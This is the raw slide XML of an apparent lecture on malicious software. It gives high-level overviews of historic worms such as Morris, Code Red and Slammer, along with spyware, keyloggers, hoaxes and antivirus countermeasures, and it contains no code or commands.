            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Best known classic worm;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Released by Robert Morris in 1988;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Targeted Unix systems;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Using several propagation techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>simple password cracking of local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> file,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>exploit bug in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>finger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> daemon,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>exploit debug trapdoor in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> daemon;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If any attack succeeds then replicated self.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>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974850" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Recent Worm Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="974851" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>new spate of attacks from mid-2001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Code Red - used MS IIS bug </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>probes random IPs for systems running IIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>had trigger time for denial-of-service attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> wave infected 360000 servers in 14 hours</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Code Red 2 - installed backdoor </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Nimda - multiple infection mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800"/>
              <a:t>SQL Slammer - attacked MS SQL server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800"/>
              <a:t>Sobig.f - attacked open proxy servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800"/>
              <a:t>Mydoom - mass email worm + backdoor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987138" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Worm Technology</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="987139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>multiplatform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>multiexploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ultrafast spreading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>polymorphic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>metamorphic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>transport vehicles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>zero-day exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU"/>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1187450" y="188913"/>
            <a:ext cx="6884988" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Today</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="ja-JP" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>s Objectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57346" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971550" y="1557338"/>
            <a:ext cx="7786688" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>To study different types of malicious software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>To learn about possible countermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>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975874" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Spyware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="975875" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>For many, spyware has replaced viruses as the most serious threat to your online identity, not to mention your PC's health</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>Can be as simple as cookie used by a web site to record a few facts about your visit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>A tiny program, downloaded often without your direct knowledge, can collect information about sites you visit or, worse, record the keystrokes used for logins and passwords. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>Can track all activities on a computer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.cexxx.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>Often, you don't suspect anything's wrong until you sense your computer is getting slower, and slower, and slower. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>Fortunately, many antispyware apps are on the market today. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU"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1001474" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Spyware (eg.) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1001476" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>AdvancedKeylogger B (www.ca.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>Date Published: Monday, May 14, 2007</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>Threat Assessment - Overall Risk: Critical , Privacy: Critical </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Key Logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400"/>
              <a:t>:  (Keystroke Logger). A program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a key logger will reveal the contents of all e-mail composed by the user. Keylog programs are commonly included in rootkits and RATs (remote administration trojans).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="2400"/>
            </a:br>
            <a:endParaRPr lang="en-AU" sz="2400"/>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1004546" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Hoaxes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1004547" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Hoaxes can be just as disruptive as the real thing.</a:t>
            </a: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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Virus Countermeasures</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30722" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="1268413"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Viral attacks exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" i="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>lack of integrity control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>on systems </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>To defend need to add such controls </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="118000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Typically by one or more of: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="118000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>prevention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> - block virus infection mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="118000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> - of viruses in infected system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="118000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>identification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> - of specific virus(es) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="118000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>removal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> - restoring system to clean state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>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946" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="152400"/>
            <a:ext cx="7173913" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Anti-Virus Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31746" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="1341438"/>
            <a:ext cx="8229600" cy="4948237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" baseline="30000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> generation scanner </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" i="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>virus signature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>to identify virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>Another type of 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="30000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> generation scanner maintains a record of the length of programs, and look for changes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="20000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2400" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" baseline="30000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> generation scanner </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>uses heuristic rules to spot viral infection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" b="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-84" charset="-128"/>
              </a:rPr>
              <a:t>or uses program checksums to spot changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="20000"/>
